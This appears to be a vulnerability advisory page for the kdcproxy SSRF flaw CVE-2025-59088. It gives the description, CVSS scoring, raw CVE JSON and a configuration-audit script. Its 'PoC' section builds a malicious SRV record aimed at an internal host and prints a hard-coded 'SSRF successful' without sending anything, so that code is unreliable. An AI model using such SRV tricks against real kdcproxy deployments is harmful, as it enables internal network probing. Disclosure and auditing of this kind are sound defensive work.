Security Vulnerability Report
CVE-2025-59088 CVSS 8.6 HIGH

CVE-2025-59088

Published: 2025-11-12 17:15:38
Last Modified: 2026-04-15 00:35:42

Description

If kdcproxy receives a request for a realm which does not have server addresses defined in its configuration, by default, it will query SRV records in the DNS zone matching the requested realm name. This creates a server-side request forgery vulnerability, since an attacker could send a request for a realm matching a DNS zone where they created SRV records pointing to arbitrary ports and hostnames (which may resolve to loopback or internal IP addresses). This vulnerability can be exploited to probe internal network topology and firewall rules, perform port scanning, and exfiltrate data. Deployments where the "use_dns" setting is explicitly set to false are not affected.
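
The mitigating condition above (DNS fallback is on unless `use_dns` is explicitly false, and any realm without configured KDCs is resolved through SRV records) can be checked against a deployment's configuration file. The audit below is an added example, not kdcproxy's own code; it assumes the kdcproxy.conf layout of a `[global]` section holding `use_dns` and one section per realm whose `kerberos` key lists KDC URLs, and the sample configs are constructed.

```python
import configparser

# Constructed sample configs, not taken from the advisory. They assume the
# kdcproxy.conf layout: [global] holds "use_dns", and each realm section
# lists its KDC URLs (space separated) under "kerberos".
WEAK_CONF = """
[global]

[EXAMPLE.COM]
kerberos = kerberos+tcp://kdc1.example.com:88

[LEGACY.EXAMPLE.COM]
kpasswd = kpasswd+tcp://kdc1.example.com:464
"""

HARDENED_CONF = WEAK_CONF.replace("[global]", "[global]\nuse_dns = false")


def dns_fallback_enabled(cfg):
    """True unless use_dns is an explicit, valid false value. Per the
    advisory only an explicit false disables the SRV fallback, so a
    missing or unparsable value counts as the default (enabled)."""
    try:
        return cfg.getboolean("global", "use_dns", fallback=True)
    except ValueError:
        return True


def audit_kdcproxy_config(text):
    """Report the CVE-2025-59088 condition for one kdcproxy.conf."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    fallback = dns_fallback_enabled(cfg)
    # Realm sections that define no KDC fall back to DNS just like realms
    # that are absent from the file altogether.
    no_kdc = sorted(s for s in cfg.sections() if s != "global"
                    and not cfg.get(s, "kerberos", fallback="").split())
    return {
        "dns_fallback": fallback,
        "realms_without_kdc": no_kdc,
        # With fallback on, any realm name an unauthenticated client sends
        # becomes an SRV lookup, so the deployment is affected regardless
        # of which realms it serves.
        "affected": fallback,
    }


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_kdcproxy_config(conf))
```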

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FreeIPA kdcproxy (all versions where use_dns=false is not set)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-59088 PoC - kdcproxy SSRF
Note: This is for educational purposes only
"""
from dnslib import DNSRecord, QTYPE, RR, SRV


def create_malicious_srv_response():
    """
    Create a DNS response with a malicious SRV record pointing to an internal host
    """
    # Target internal IP to probe
    target_ip = "10.0.0.1"  # Internal network address

    # DNS response construction: dnslib expects the SRV rdata as an SRV
    # object (priority, weight, port, target), not as a string
    reply = DNSRecord()
    reply.header.id = 12345
    reply.add_answer(RR(
        "_kerberos._tcp.example.com",
        QTYPE.SRV,
        ttl=300,
        rdata=SRV(0, 100, 88, f"kdc.{target_ip}"),
    ))
    return reply.pack()


def exploit_kdcproxy(target_host, realm):
    """
    Simulate sending a request to kdcproxy that triggers the DNS lookup
    """
    # Craft Kerberos AS-REQ for the target realm
    # In a real attack, this would be sent to the vulnerable kdcproxy
    print(f"[*] Targeting: {target_host}")
    print(f"[*] Requesting realm: {realm}")
    print(f"[*] kdcproxy will query DNS for _kerberos._tcp.{realm}")
    print("[*] Attacker controls DNS, returns malicious SRV record")
    print("[*] kdcproxy connects to internal IP: 10.0.0.1:88")
    print("[!] SSRF successful - internal network probed")


if __name__ == "__main__":
    target = "vulnerable-kdcproxy.example.com"
    malicious_realm = "attacker-controlled-domain.com"
    exploit_kdcproxy(target, malicious_realm)
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-59088", "sourceIdentifier": "[email protected]", "published": "2025-11-12T17:15:38.153", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "If kdcproxy receives a request for a realm which does not have server addresses defined in its configuration, by default, it will query SRV records in the DNS zone matching the requested realm name. This creates a server-side request forgery vulnerability, since an attacker could send a request for a realm matching a DNS zone where they created SRV records pointing to arbitrary ports and hostnames (which may resolve to loopback or internal IP addresses). This vulnerability can be exploited to probe internal network topology and firewall rules, perform port scanning, and exfiltrate data. Deployments where\nthe \"use_dns\" setting is explicitly set to false are not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:21138", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21139", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21140", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21141", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21142", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21448", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21748", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21806", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21818", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21819", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21820", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21821", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22982", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-59088", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2393955", "source": "[email protected]"}, {"url": "https://github.com/latchset/kdcproxy/pull/68", "source": "[email protected]"}]}}
```